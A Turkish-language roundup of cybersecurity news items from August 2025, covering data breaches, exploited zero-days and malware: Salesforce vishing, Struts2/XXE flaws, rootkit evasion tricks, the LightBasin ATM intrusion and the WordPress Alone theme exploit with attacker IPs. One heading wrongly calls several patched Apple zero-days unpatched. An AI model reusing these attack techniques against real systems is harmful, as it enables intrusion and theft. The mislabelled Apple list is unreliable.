Benzer saldırılardan Adidas, Qantas, Allianz Life ve LVMH bünyesindeki Louis Vuitton, Dior ile Tiffany & Co. markalarının da etkilendiği biliniyor. Ancak, henüz kamuoyuna açıklanmayan başka şirketlerin de saldırıya uğradığı belirtiliyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

BleepingComputer’ın edindiği bilgilere göre, sızan dosya karanlık ağ forumlarında değil, “PBS Kids” hayranlarının bulunduğu Discord topluluklarında paylaşıldı. Bu sunucularda genç yetişkinler, ergenler ve çocuklar favori televizyon programlarını konuşuyor. Kaynaklar, dosyanın bu gruplarda “merak, isyankâr heves veya arkadaş çevresinde dikkat çekme” amacıyla dolaştığını, ancak verilerin kötüye kullanılma ihtimalinin bulunduğunu aktardı.

Paylaşılan JSON formatındaki dosya, 3.997 PBS çalışanı ve bağlı kuruluş personeline ait isim, kurumsal e-posta adresi, görev unvanı, zaman dilimi, departman, lokasyon, iş fonksiyonları, hobiler ve amir isimlerini içeriyor.

PBS, olayın ardından etkilenen kullanıcılarla iletişime geçtiğini ve şu an için diğer sistemlerde bir güvenlik ihlali bulgusuna rastlanmadığını açıkladı. Şirketin açıklamasında, “MyPBS.org platformundan kullanıcı verilerinin yer aldığı dosyanın çevrimiçi olarak paylaşıldığı bilgisinin ardından kapsamlı bir soruşturma başlatıldı” denildi.

Verilerin şu ana kadar kötü amaçla kullanıldığına dair bir bulgu olmasa da, dosyanın bu hafta sonu bile Discord topluluklarında dolaşmaya devam ettiği belirtiliyor. Özellikle PBS ve NPR üzerindeki siyasi baskılar göz önünde bulundurulduğunda, bu verilerin taciz veya doxxing amacıyla kullanılabileceği endişesi dile getiriliyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Adobe, Adobe Experience Manager (AEM) Forms on JEE için iki kritik sıfırıncı gün güvenlik açığını kapatan acil güncellemeler yayımladı. CVE-2025-54253 ve CVE-2025-54254 olarak izlenen açıklar, kimlik doğrulaması gerekmeksizin uzaktan kod çalıştırma ve yerel dosya okuma saldırılarına olanak tanıyor.

CVE-2025-54253, /adminui modülündeki kimlik doğrulama atlatma hatası ve yanlış yapılandırılmış geliştirici ayarından kaynaklanıyor. Struts2’nin geliştirme modunun açık bırakılması, saldırganların HTTP istekleriyle OGNL ifadeleri çalıştırmasına imkân veriyor. Bu açık, CVSS 8.6 “kritik” olarak derecelendirildi.

CVE-2025-54254 ise SOAP tabanlı kimlik doğrulama hizmetinde yer alan XML External Entity (XXE) zafiyetinden kaynaklanıyor. Özel hazırlanmış XML istekleriyle saldırganlar, kimlik doğrulama olmadan sunucu üzerindeki yerel dosyaları (örneğin win.ini) okuyabiliyor. Bu açık CVSS 10.0 ile “maksimum kritik” seviyede değerlendirildi.

Söz konusu güvenlik sorunlarını Shubham Shah ve Adam Kues (Searchlight Cyber) 28 Nisan 2025’te Adobe’a bildirdi. Üçüncü bir açık olan CVE-2025-49533 (Java deserialization yoluyla RCE) ise aynı güncelleme paketiyle giderildi. Araştırmacılar, 90 günlük bekleme süresi dolduktan sonra 29 Temmuz’da teknik ayrıntıları kamuya açıkladı.

Adobe, yöneticilere en kısa sürede en son güncellemeleri ve hotfix’leri yüklemelerini tavsiye etti. Güncelleme imkânı olmayan sistemlerde ise platform erişiminin internetten kısıtlanması önerildi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Elde edilen veriler arasında kullanıcıların adları, çalıştıkları kurum isimleri, adresleri, Cisco tarafından atanmış kullanıcı kimlikleri, e-posta adresleri, telefon numaraları ve hesap oluşturma tarihleri gibi meta veriler yer alıyor. Cisco, olayda kurumsal müşterilere ait gizli bilgiler, parolalar veya hassas verilerin ele geçirilmediğini, ürün ve hizmetlerin etkilenmediğini vurguladı.

Şirket, saldırganın ilgili CRM sistemine erişiminin derhal sonlandırıldığını, veri koruma otoriteleriyle iletişime geçildiğini ve yasal gereklilikler doğrultusunda etkilenen kullanıcıların bilgilendirildiğini açıkladı. Cisco, benzer saldırıları önlemek için personeline vishing girişimlerini tanıma ve önleme konusunda ek eğitimler vereceğini duyurdu.

Olayın, ShinyHunters grubu ile ilişkilendirilen ve son haftalarda Adidas, Qantas, Allianz Life, LVMH markaları ile Chanel gibi büyük şirketleri etkileyen Salesforce tabanlı veri hırsızlığı saldırıları dalgasının bir parçası olabileceği değerlendiriliyor. Cisco, verilerin Salesforce ortamından mı çalındığını veya kaç kullanıcının etkilendiğini ise doğrulamadı.

Geçmişte de benzer güvenlik sorunları yaşayan şirket, Ekim ayında DevHub portalını, IntelBroker adlı tehdit aktörünün sızdırdığı “gizli” veriler sonrası çevrimdışına almış, Kasım ayında ise bunun hatalı yapılandırılmış herkese açık bir portal nedeniyle gerçekleştiğini açıklamıştı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Arctic Wolf, saldırıların ilk erişim yönteminin henüz netleşmediğini, ancak kimlik bilgisi hırsızlığı, brute force, sözlük saldırıları ve kimlik bilgisi doldurma yöntemlerinin tüm vakalarda kesin olarak dışlanmadığını belirtti. Yine de sıfırıncı gün açığının varlığı “yüksek olasılıklı” olarak değerlendirildi.

Huntress tarafından yapılan ayrı bir analizde, SonicWall VPN’lerde çok faktörlü kimlik doğrulamayı atlatabilen ve fidye yazılımı dağıtabilen bir açığın aktif olarak istismar edildiği bildirildi. Huntress, VPN hizmetinin tamamen devre dışı bırakılmasını veya IP allow-listing yöntemiyle erişimin kısıtlanmasını önerdi. Şirket, saldırganların ilk ihlalin ardından saatler içinde etki alanı denetleyicilerine yöneldiğini vurguladı.

SonicWall, müşterilere şu önlemleri almalarını tavsiye etti:

• SSLVPN hizmetini mümkünse devre dışı bırakmak,
• Erişimi yalnızca güvenilir IP adresleriyle sınırlandırmak,
• Botnet Koruması ve Coğrafi IP Filtreleme gibi güvenlik servislerini etkinleştirmek,
• Tüm uzak erişimlerde MFA kullanmak,
• Kullanılmayan hesapları silmek.

Şirket, son 72 saatte SSLVPN açık olan Gen 7 güvenlik duvarlarını hedef alan vakalarda artış yaşandığını belirterek, olayların bilinen bir açıkla mı yoksa yeni bir güvenlik açığıyla mı bağlantılı olduğunun araştırıldığını duyurdu.

SonicWall, kısa süre önce SMA 100 cihazları için uzaktan kod çalıştırmaya yol açabilecek kritik bir güvenlik açığını (CVE-2025-40599) da yamalama uyarısı yapmıştı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

CVE-2025-21479, GPU micronode üzerinde yetkisiz komut çalıştırılması sonucu bellek bozulmasına yol açan bir yetkilendirme hatası olarak tanımlanıyor. CVE-2025-27038 ise Chrome tarayıcısında grafik işleme sırasında ortaya çıkan use-after-free hatasıyla bellek bozulmasına neden oluyor.

Qualcomm, bu açıklar için yamaları Mayıs ayında OEM üreticilerine sağlamış ve etkilenen cihazların en kısa sürede güncellenmesini tavsiye etmişti. ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı (CISA) da her iki açığı 3 Haziran’da “aktif olarak istismar edilen açıklar” listesine ekleyerek federal kurumlara 24 Haziran’a kadar sistemlerini koruma talimatı verdi.

Bu ayki Android güvenlik güncellemesinde ayrıca, sistem bileşeninde ayrıcalığı olmayan saldırganların, diğer güvenlik açıklarıyla zincirlenerek kullanıcı etkileşimi olmadan uzaktan kod çalıştırmasına imkân tanıyan kritik bir hata da giderildi.

Google, 2025-08-01 ve 2025-08-05 olmak üzere iki güvenlik yaması paketi sundu. İkinci paket, birincideki tüm düzeltmelerin yanı sıra kapalı kaynak üçüncü taraf bileşenleri ve çekirdek alt bileşenlerine yönelik yamaları da içeriyor. Google Pixel cihazları bu güncellemeleri anında alırken, diğer üreticiler test ve uyarlama sürecinden geçtiği için gecikmeli dağıtım yapabiliyor.

Geçmişte de benzer tehditlerle karşılaşan Android ekibi, Mart ayında Sırp yetkililerin el konulan cihazları açmak için kullandığı iki sıfırıncı gün açığını kapatmıştı. Kasım 2024’te ise NoviSpy casus yazılım saldırılarında kullanılan başka bir Android sıfırıncı gün açığı giderilmişti.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Geçen yıl 4 milyon dolar ödül havuzuyla gerçekleştirilen yarışmada, bulut ve yapay zeka ürünlerindeki güvenlik açıklarını bulan araştırmacılara toplam 1,6 milyon dolar ödül dağıtılmış, 600’den fazla güvenlik açığı bildirimi alınmıştı.

Bu yıl 4 Ağustos - 4 Ekim 2025 tarihleri arasında başvurular kabul edilecek. Yarışma, tüm güvenlik araştırmacılarına açık olacak ve kritik açıklar ile yüksek etkili senaryolar için yüzde 50’ye kadar ödül çarpanı uygulanacak. Öncelikli ürünler arasında Microsoft Azure, Copilot, Dynamics 365, Power Platform, Identity ve M365 yer alıyor.

Başarılı araştırmacılar, 2026 baharında Microsoft’un Redmond kampüsünde düzenlenecek canlı hacking etkinliğine davet edilecek. Etkinlikte katılımcılar, Microsoft Security Response Center ve ürün ekipleriyle doğrudan çalışacak. Yarışma sürecinde Microsoft’un AI Red Team, MSRC ve Dynamics ekipleri, yapay zeka sistem testleri, bug bounty programları ve güvenlik araştırma yöntemleri konularında eğitimler verecek.

Zero Day Quest, Microsoft’un 2023’te başlattığı Secure Future Initiative (SFI) kapsamında düzenleniyor. SFI, şirketin güvenlik kültürünü geliştirmeyi ve “varsayılan olarak güvenli” yaklaşımını benimsemeyi hedefliyor. Microsoft, yarışmadan elde edilen bulguların bulut ve yapay zeka güvenliğini artırmak için şirket genelinde paylaşılacağını belirtti.

Şirket ayrıca .NET ve ASP.NET Core açıkları için maksimum ödülü 40 bin dolara çıkarırken, Power Platform ve Dynamics 365 AI açıkları ile Microsoft Copilot güvenlik hataları için de ödülleri artırdı. Copilot açıkları için tüm bildirimlerde yüzde 100 ödül çarpanı uygulanmaya başlandı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Chanel’in açıklamasına göre, yalnızca müşteri hizmetleri merkeziyle iletişime geçen bazı kişilerin isim, e-posta adresi, posta adresi ve telefon numarası gibi bilgileri etkilendi. Şirket, başka hiçbir kişisel bilginin bu veritabanında bulunmadığını ve etkilenen müşterilerin bilgilendirildiğini belirtti.

BleepingComputer’ın edindiği bilgilere göre, veriler Chanel’in Salesforce ortamından çalındı. Bu olay, ShinyHunters adlı fidye ve veri hırsızlığı grubunun yürüttüğü geniş çaplı Salesforce veri hırsızlığı saldırılarının bir parçası. Mandiant’ın raporuna göre, saldırganlar vishing (telefonla kimlik avı) yöntemleriyle çalışanlardan giriş bilgilerini alıyor veya kötü amaçlı bir OAuth uygulamasına erişim izni verdirerek Salesforce hesaplarına sızıyor.

Erişim sağlandıktan sonra, saldırganlar müşteri veritabanlarını kopyalayıp şirketleri e-posta yoluyla fidye talepleriyle tehdit ediyor. Salesforce, kendi platformunda herhangi bir güvenlik açığı bulunmadığını ve ihlallerin tamamen sosyal mühendislik yoluyla müşteri hesaplarının ele geçirilmesinden kaynaklandığını vurguladı. Şirket, tüm kullanıcıları çok faktörlü kimlik doğrulama (MFA) kullanmaya, en az ayrıcalık ilkesini uygulamaya ve bağlı uygulamaları dikkatle yönetmeye çağırdı.

ShinyHunters grubunun saldırılarından etkilenen diğer markalar arasında Adidas, Qantas, Allianz Life ve LVMH bünyesindeki Louis Vuitton, Dior ile Tiffany & Co. yer alıyor. Şu ana kadar çalınan verilerin kamuya sızdırılmadığı, şirketlerin e-posta ile tehdit edildiği bildirildi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Proton Authenticator, Windows, macOS, Linux, Android ve iOS’ta çalışan, ücretsiz ve bağımsız bir iki faktörlü kimlik doğrulama uygulaması olarak tasarlandı. Uygulama, web siteleri ve uygulamalara girişte tek kullanımlık kodlar üretmek için gerekli TOTP sırlarını saklıyor.

Sorun, bir kullanıcının Reddit’te (daha sonra silinen) paylaşımıyla gündeme geldi. Kullanıcı, bazı 2FA girişlerinin kaybolduğunu fark edip hata raporu hazırlarken uygulama günlüklerinde tüm TOTP sırlarının açıkça göründüğünü keşfetti. Hatanın, iOS sürümünde TOTP girişine ait bilgilerin bir params değişkenine eklenmesi ve bu verilerin günlük kayıtlarına dahil edilmesinden kaynaklandığı belirlendi.

Proton, hatayı doğrulayarak iOS uygulamasının 1.1.1 sürümüyle App Store’da yayımlanan güncellemede düzeltildiğini açıkladı. Şirket, sırların hiçbir zaman sunucuya şifrelenmemiş olarak iletilmediğini, tüm senkronizasyonun uçtan uca şifrelemeyle yapıldığını ve günlüklerin yalnızca cihazda tutulduğunu belirtti.

Proton ayrıca, cihaz erişimi olan bir kişinin bu günlükleri görmese bile sırları elde edebileceğini, bu nedenle cihaz güvenliğinin kullanıcı sorumluluğunda olduğunu vurguladı. Uzaktan sömürülemeyen bu hata, günlük dosyalarının paylaşılması durumunda üçüncü taraflara erişim riski oluşturuyordu. Bu veriler başka bir kimlik doğrulayıcıya aktarılarak ilgili hesaplara giriş kodu üretilebilirdi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Plague, analiz ve tersine mühendislik girişimlerini engellemek için anti-debugging yeteneklerine sahip. Yazılım ayrıca sabitlenmiş parolalar üzerinden gizli erişim sağlıyor, saldırgan oturumlarının izlerini gizliyor, komut geçmişini /dev/null dizinine yönlendirerek kayıtların tutulmasını engelliyor ve SSH bağlantı bilgilerini sistem ortam değişkenlerinden siliyor.

Araştırmacı Pierre-Henri Pezier, zararlı yazılımın kimlik doğrulama katmanına derinlemesine entegre olduğunu, sistem güncellemelerinden etkilenmediğini ve adli izler bırakmadığını belirtti. Çeşitli Linux dağıtımlarında farklı GCC sürümleriyle derlenmiş örnekler, yazılımın uzun süredir aktif olarak geliştirildiğini gösteriyor.

Nextron Systems, son bir yılda VirusTotal’a yüklenen çok sayıda varyantın hiçbir antivirüs yazılımı tarafından zararlı olarak işaretlenmediğini, bu durumun saldırganların faaliyetlerini tespit edilmeden sürdürebildiğini ortaya koyduğunu bildirdi.

Mayıs ayında aynı şirket, PAM altyapısını kötüye kullanarak kimlik bilgilerini çalabilen, kimlik doğrulamayı atlayabilen ve kalıcı erişim sağlayabilen başka bir zararlı yazılım keşfetmişti.

Kaynak: CUMHA - CUMHUR HABER AJANSI

4L4MD4R, 27 Temmuz’da bir zararlı yazılım yükleyicisinin tespit edilmesiyle ortaya çıktı. Bu yükleyici, fidye yazılımını theinnovationfactory[.]it alan adından indirerek çalıştırıyor. Yükleyicinin, hedef cihazlarda güvenlik izleme işlevlerini devre dışı bırakmak için tasarlanmış PowerShell komutları kullandığı belirlendi.

Araştırmalara göre 4L4MD4R, GoLang ile yazılmış ve UPX ile paketlenmiş durumda. Çalıştırıldığında AES şifreli yükünü bellekte çözüyor, ayrılmış belleğe yüklüyor ve yeni bir iş parçacığında çalıştırıyor. Saldırı sonrası dosyaları şifreleyen zararlı yazılım, 0,005 Bitcoin fidye talep ediyor ve şifrelenmiş dosyaların listesi ile fidye notlarını sistemde bırakıyor.

Microsoft ve Google, ToolShell saldırılarını Çin merkezli tehdit aktörleriyle ilişkilendirdi. Microsoft, Linen Typhoon, Violet Typhoon ve Storm-2603 olarak izlenen üç devlet destekli grubun güvenlik açıklarını istismar ettiğini açıkladı.

Şimdiye kadar ABD Ulusal Nükleer Güvenlik İdaresi, Eğitim Bakanlığı, Florida Gelir İdaresi, Rhode Island Genel Kurulu ve Avrupa ile Orta Doğu’daki bazı devlet kurumlarının bu saldırılardan etkilendiği bildirildi.

ToolShell saldırıları ilk olarak Hollanda merkezli Eye Security tarafından tespit edildi. Sıfırıncı gün açıkları CVE-2025-49706 ve CVE-2025-49704 üzerinden yürütülen saldırılar, 7 Temmuz’dan itibaren hükümet, telekom ve teknoloji kuruluşlarını hedef aldı. Microsoft, Temmuz 2025 güvenlik güncellemeleriyle bu açıkları kapattığını, ayrıca yamalanmış SharePoint sunucularını etkileyen iki yeni sıfırıncı gün açığı için CVE-2025-53770 ve CVE-2025-53771 kimliklerini atadığını duyurdu.

Eye Security CTO’su Piet Kerkhofs, gerçek etkinin açıklanan rakamların üzerinde olduğunu, en az 400 sunucunun zararlı yazılımla enfekte edildiğini ve 148 kurumun uzun süreli olarak ihlal altında kalmış olabileceğini belirtti. ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı (CISA), CVE-2025-53770 güvenlik açığını istismar edilen açıklar listesine ekleyerek federal kurumlara 24 saat içinde sistemlerini güvenceye almaları talimatını verdi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Şirketin açıklamasına göre saldırganlar, AMO ekibi adına sahte e-postalar göndererek geliştirici hesaplarının erişim haklarını korumak için güncelleme yapılması gerektiğini iddia ediyor. E-postalarda genellikle “Mozilla Eklenti hesabınızın geliştirici özelliklerine erişmeye devam etmesi için güncelleme gereklidir” şeklinde ifadeler yer alıyor.

Mozilla, geliştiricilerin gelen e-postaların mozilla.org, firefox.com, mozilla.com veya bunların alt alan adlarından geldiğini doğrulamaları gerektiğini, SPF, DKIM ve DMARC gibi e-posta kimlik doğrulama kontrollerinin geçerli olup olmadığını kontrol etmelerini tavsiye etti. Şirket ayrıca, şüpheli e-postalardaki bağlantılara tıklanmaması ve giriş bilgilerinin yalnızca resmi Mozilla veya Firefox alan adlarında girilmesi gerektiğini vurguladı.

Saldırıların ölçeği ve herhangi bir geliştirici hesabının ele geçirilip geçirilmediği henüz açıklanmadı. Ancak en az bir geliştiricinin saldırıya maruz kaldığını bildirdiği öğrenildi. Mozilla, yeni bilgiler ortaya çıktıkça güncelleme yapacağını belirtti.

Bu uyarı, geçen ay Mozilla Add-ons Operasyon ekibinin kripto para cüzdanlarını boşaltmaya yönelik kötü amaçlı Firefox uzantılarını engellemeyi hedefleyen yeni bir güvenlik özelliğini duyurmasının ardından geldi. Mozilla Add-ons Operasyon Müdürü Andreas Wagner, son yıllarda yüzlerce kötü amaçlı eklentiyi kaldırdıklarını ve siber saldırganların geçen yıl bu yöntemle 494 milyon dolar değerinde kripto para çaldığını açıkladı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Cloudflare Email Security ekibinin tespitlerine göre, saldırganlar Proofpoint ve Intermedia tarafından korunan e-posta hesaplarını ele geçirerek, zararlı bağlantıları bu hizmetlerin güvenli görünen URL’leri aracılığıyla iletti. Bağlantılar, zincirleme yönlendirmeler ve URL kısaltma servisleriyle gizlenerek kullanıcıların oltalama sitelerine ulaşması sağlandı.

Araştırmacılar, saldırıların sahte sesli mesaj bildirimleri veya Microsoft Teams üzerinde paylaşılan belgeler gibi görünümlerle yürütüldüğünü aktardı. Yönlendirme zincirinin sonunda, kullanıcıların giriş bilgilerini ele geçirmek için tasarlanmış Microsoft Office 365 oltalama sayfaları yer aldı.

Intermedia hizmetinin kötüye kullanıldığı vakalarda ise saldırganlar, “Zix” güvenli mesaj bildirimleri veya yeni bir Teams mesajı bildirimi gibi e-postalar gönderdi. Bu e-postalarda yer alan ve Intermedia tarafından sarılmış görünen bağlantılar, Constant Contact platformu üzerinden barındırılan oltalama sayfalarına yönlendirdi.

Cloudflare, meşru görünen bağlantıların saldırı başarısını artırdığını, link-wrapping özelliğinin bu şekilde istismar edilmesinin ise oltalama yöntemlerinde yeni bir gelişme olduğunu vurguladı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Açıklamaya göre, bazı art niyetli kişilerin yardım başvurusu bahanesiyle vatandaşlardan kimlik ve banka bilgileri talep ettiği, sahte formlar aracılığıyla hesap açtırmaya çalıştıkları belirlendi. Bu girişimlerin dolandırıcılık amacı taşıdığı ve resmi kurumlarla hiçbir bağlantısının olmadığı ifade edildi.

Başvuruların sadece www.kayseri.bel.tr adresi üzerinden yapılabileceği hatırlatıldı. İhtiyaç sahibi vatandaşlar, internet sitesindeki “Online Hizmetler” menüsünde yer alan “Kırtasiye Yardımı” bölümü üzerinden 1 Ağustos – 17 Ağustos 2025 tarihleri arasında başvuru gerçekleştirebilecek.

Belediye, vatandaşların telefon, kısa mesaj veya sosyal medya yoluyla yapılan yönlendirmelere itibar etmemeleri gerektiğini belirtti. Şüpheli durumlarla karşılaşılması halinde ise vakit kaybetmeden emniyet birimlerine başvurulması çağrısı yapıldı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Lenovo, belirli hepsi bir arada (All-in-One) masaüstü bilgisayar modellerinde bulunan ve Secure Boot mekanizmasını aşmaya imkân tanıyan altı yüksek önem derecesine sahip BIOS açığını kapatmak amacıyla yeni firmware güncellemeleri yayımladı.

Güvenlik Açıklarının Kaynağı ve Etkisi

Açıklar, Lenovo için Insyde tarafından özelleştirilen InsydeH2O UEFI firmware kodlarında bulunuyor. Saldırganlar için büyük tehlike arz eden bu açıklar, işletim sistemi yüklenmeden önce çalışan ve yüksek kalıcılığa sahip System Management Mode (SMM) katmanında yer alıyor. Bu sayede, kötü niyetli kişiler sisteme derinlemesine erişim sağlayabiliyor.

Etkilenen Modeller

• IdeaCentre AIO 3 24ARR9
• IdeaCentre AIO 3 27ARR9
• Yoga AIO 27IAH10
• Yoga AIO 32ILL10
• Yoga AIO 32IRH8

Tespit Edilen Güvenlik Açıkları ve CVSS Puanları

• CVE-2025-4421: Doğrulanmamış RSI kaydı ile SMRAM belleğe yazım yapılabiliyor. (CVSS: 8.2)
• CVE-2025-4422: SMM bellekte bozulmaya yol açan işleyici açığı. (CVSS: 8.2)
• CVE-2025-4423: SMM içerisinde keyfi bellek yazımı ile kod çalıştırma. (CVSS: 8.2)
• CVE-2025-4424: Yanıltıcı girişlerle firmware ayarlarının değiştirilmesi. (CVSS: 6.0)
• CVE-2025-4425: Stack buffer overflow ile SMM yetki yükselmesi ve kod çalıştırma. (CVSS: 8.2)
• CVE-2025-4426: SMRAM içeriğinin sızdırılması yoluyla hassas veri açığa çıkması. (CVSS: 6.0)

Bildirim ve Koordinasyon Süreci

Binarly güvenlik araştırma firması, bu açıkları 8 Nisan 2025 tarihinde Lenovo’ya bildirdi. Lenovo, 16 Haziran’da durumu doğruladı ve 90 günlük koordineli açıklama sürecinin ardından 29 Temmuz 2025’te kamuoyuna duyurdu.

Güncellemeler ve Tavsiyeler

IdeaCentre AIO 3 modelleri için O6BKT1AA firmware sürümü yayımlandı ve kullanıcılara en kısa sürede güncelleme yapmaları öneriliyor. Yoga AIO modelleri için güncellemeler henüz yayımlanmadı; Lenovo, bu yamaların 30 Eylül – 30 Kasım 2025 tarihleri arasında sunulacağını bildirdi.

Insyde tarafından yapılan açıklamada, bu açıkların sadece Lenovo için geliştirilmiş özelleştirilmiş InsydeH2O firmware sürümlerinde bulunduğu, tüm InsydeH2O kullanan sistemlerin etkilenmediği vurgulandı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Apple, Chrome kullanıcılarını hedef alan ve CVE-2025-6558 numarasıyla izlenen yüksek riskli sıfır gün güvenlik açığını düzeltmek amacıyla kapsamlı güncellemeler yayımladı. Bu açık, Apple’ın çoğu platformunu etkileyen ANGLE (Almost Native Graphics Layer Engine) adlı grafik soyutlama katmanında tespit edildi.

Açığın Detayları ve Riskleri

ANGLE bileşeni, OpenGL ES API çağrılarını Direct3D, Metal, Vulkan ve OpenGL gibi grafik API’lerine dönüştürür. CVE-2025-6558, özel hazırlanmış HTML sayfaları aracılığıyla tarayıcının GPU sürecinde rastgele kod çalıştırılmasına imkân veriyor. Bu da tarayıcı sandbox güvenlik sınırlarının aşılmasına ve sistem üzerinde potansiyel tam kontrol sağlanmasına yol açabiliyor.

Keşif ve Yama Süreci

Google Tehdit Analiz Grubu (TAG) araştırmacıları Vlad Stolyarov ve Clément Lecigne tarafından Haziran 2025’te keşfedilen açık, 15 Temmuz’da Chrome ekibine bildirildi ve hızla yamalandı. Google, bu açığın devlet destekli tehdit aktörleri tarafından aktif şekilde kullanıldığını doğruladı.

Apple’ın Güncellemeleri

• iOS 18.6 ve iPadOS 18.6: iPhone XS ve sonrası, çeşitli iPad Pro, iPad Air ve iPad mini modelleri
• macOS Sequoia 15.6
• iPadOS 17.7.9: iPad Pro 12.9 inç 2. nesil, 10.5 inç modeli ve iPad 6. nesil
• tvOS 18.6: Apple TV HD ve tüm Apple TV 4K modelleri
• visionOS 2.6: Apple Vision Pro
• watchOS 11.6: Apple Watch Series 6 ve sonrası

Apple, güncellemeye ilişkin açıklamasında “Kötü amaçlı web içeriğinin işlenmesi, Safari’nin beklenmedik şekilde çökmesine neden olabilir” ifadelerini kullandı ve açığın yalnızca Apple yazılımlarında değil, aynı zamanda açık kaynak projelerde de bulunduğunu belirtti.

CISA’dan Zorunlu Güncelleme Talimatı

ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı (CISA), CVE-2025-6558 açığını aktif olarak istismar edilen güvenlik açıkları listesine ekleyerek federal kurumlara 12 Ağustos 2025’e kadar yama uygulamalarını zorunlu kıldı. Ayrıca, tüm sistem yöneticilerine de öncelikli olarak bu açığın kapatılması çağrısı yapıldı.

Apple’ın 2025’te Düzeltmediği Diğer Sıfır Gün Açıkları

2025 yılı başından itibaren Apple tarafından halen yamalanmamış olan diğer kritik sıfır gün açıkları şunlardır:

• CVE-2025-24085 (Ocak 2025)
• CVE-2025-24200 (Şubat 2025)
• CVE-2025-24201 (Mart 2025)
• CVE-2025-31200 ve CVE-2025-31201 (Nisan 2025)

Kaynak: CUMHA - CUMHUR HABER AJANSI

Uluslararası düzeyde bankacılık sistemlerine yönelik siber saldırılarıyla tanınan LightBasin (UNC2891) grubu, fiziksel erişim sağladığı bir bankada sofistike bir hibrit saldırı gerçekleştirdi. Grup, ATM ağına bağlı bir ağ anahtarına 4G modemli Raspberry Pi cihazı yerleştirerek güvenlik duvarlarını aşmayı ve iç ağa kalıcı uzaktan erişim sağlamayı başardı.

Saldırı Tespiti ve Amaç

Group-IB güvenlik firması, bankanın ağında tespit ettiği şüpheli trafik üzerine yaptığı incelemede bu saldırıyı ortaya çıkardı. Saldırının hedefi, ATM işlemlerini taklit ederek haksız nakit para çekimi gerçekleştirmekti.

TinyShell ile Gizli Komuta Kontrol (C2) Bağlantısı

Saldırganlar, Raspberry Pi cihazını TinyShell adlı açık kaynaklı arka kapı yazılımı ile komuta ve kontrol (C2) merkezi olarak yapılandırdı. Cihaz, 4G bağlantısıyla dış dünya ile gizli iletişim kurdu.

Ağda yatay hareketler gerçekleştirilerek Banka'nın Ağ İzleme Sunucusu’na ve ardından doğrudan internet erişimi bulunan E-posta Sunucusu’na erişildi. Böylece saldırganlar iç ağda kalıcı ve geniş kapsamlı erişim sağladı.

İleri Teknikler ve Gizlenme Yöntemleri

Zararlı yazılımlar, Linux sistemlerinde yaygın olan “LightDM” ekran yöneticisine benzer şekilde “lightdm” ismiyle kaydedilerek tespit edilmekten kaçınıldı. Ayrıca tmpfs ve ext4 dosya sistemleri kullanılarak zararlı süreçlerin /proc/[pid] yollarına bağlanması sağlandı; bu teknik adli analiz araçlarının işlem geçmişini görmesini engelledi.

Son Hedef: Caketap Rootkit

LightBasin’in nihai hedefi, Oracle Solaris tabanlı sistemlere Caketap adlı özel rootkit’i kurmaktı. Bu rootkit, ödeme sistemlerindeki HSM (Hardware Security Module) yanıtlarını manipüle ederek reddedilen işlemlerin onaylanmış gibi görünmesini sağlıyordu.

Ancak saldırganlar bu amaca ulaşamadan tespit edildi. Group-IB uzmanları, başarılı olsaydı büyük maddi kayıplar ve ciddi güvenlik ihlalleri yaşanabileceğini vurguladı.

Fiziksel Sızma Şüpheleri ve Ağ İletişimi

Saldırganların bankanın şubesine fiziksel erişim sağlayıp sağlamadığı veya bir içeriden destek alıp almadığı henüz kesinleşmedi. Ağ izleme sunucusunun her 600 saniyede bir, Raspberry Pi cihazına 929 numaralı port üzerinden veri gönderdiği belirlendi; bu da cihazın ağda pivot noktası olarak kullanıldığını gösteriyor.

LightBasin Grubunun Geçmişi

2016’dan beri finans ve telekom sektörlerine yönelik karmaşık siber operasyonlar yürüten LightBasin, Unix sistemleri ve mobil ağ altyapılarına yönelik çok sayıda saldırı gerçekleştirmiş gelişmiş bir tehdit aktörüdür.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Siber saldırganlar, WordPress’in yaygın kullanılan Alone temasında tespit edilen CVE-2025-5394 kodlu kritik açığı aktif şekilde istismar ediyor. Bu zafiyet, uzaktan kimlik doğrulaması olmadan rastgele dosya yüklenmesine ve siteye tam erişim sağlanmasına yol açıyor.

Saldırı Yöntemi ve Etkileri

Wordfence tarafından tespit edilen saldırılar, Alone temasının alone_import_pack_install_plugin() işlevindeki güvenlik kontrol eksikliğinden kaynaklanıyor. Bu işlev, WordPress’teki wp_ajax_nopriv_ kancası aracılığıyla yetkisiz kullanıcıların dış URL’lerden eklenti kurmasına izin veriyor.

Saldırganlar, bu açığı kullanarak şifre korumalı PHP arka kapılar, ZIP arşivlerine gizlenmiş web shell’ler veya veritabanına erişim sağlayan dosya yöneticileri yüklüyor. Ayrıca, gizli yönetici hesapları oluşturularak kalıcı erişim sağlanıyor.

İstatistikler ve Tespit Edilen Saldırılar

Wordfence, açığın kamuya açıklanmasından önce saldırıların başladığını ve şu ana kadar 120 binden fazla istismar girişiminin engellendiğini açıkladı. Saldırı belirtileri arasında yeni yönetici kullanıcıların oluşması, şüpheli ZIP dosyaları ve olağandışı admin-ajax.php?action=alone_import_pack_install_plugin HTTP istekleri yer alıyor.

Engellenmesi Önerilen IP Adresleri

• 193.84.71.244
• 87.120.92.24
• 146.19.213.18
• 2a0b:4141:820:752::2

Sistem yöneticilerinin bu IP adreslerini engellemesi öneriliyor.

Yama ve İletişim Problemi

Alone temasının 7.8.3 ve önceki sürümleri saldırıya açık durumda. Geliştirici Bearsthemes, 16 Haziran 2025’te 7.8.5 sürümüyle açığı yamaladı. Ancak Wordfence, ilk bildirimi 30 Mayıs’ta yapmasına rağmen geliştiriciden yanıt alamadığı için durumu 12 Haziran’da Envato Market ekibine iletmek zorunda kaldı.

Temanın Kullanım Alanları ve Benzer Olaylar

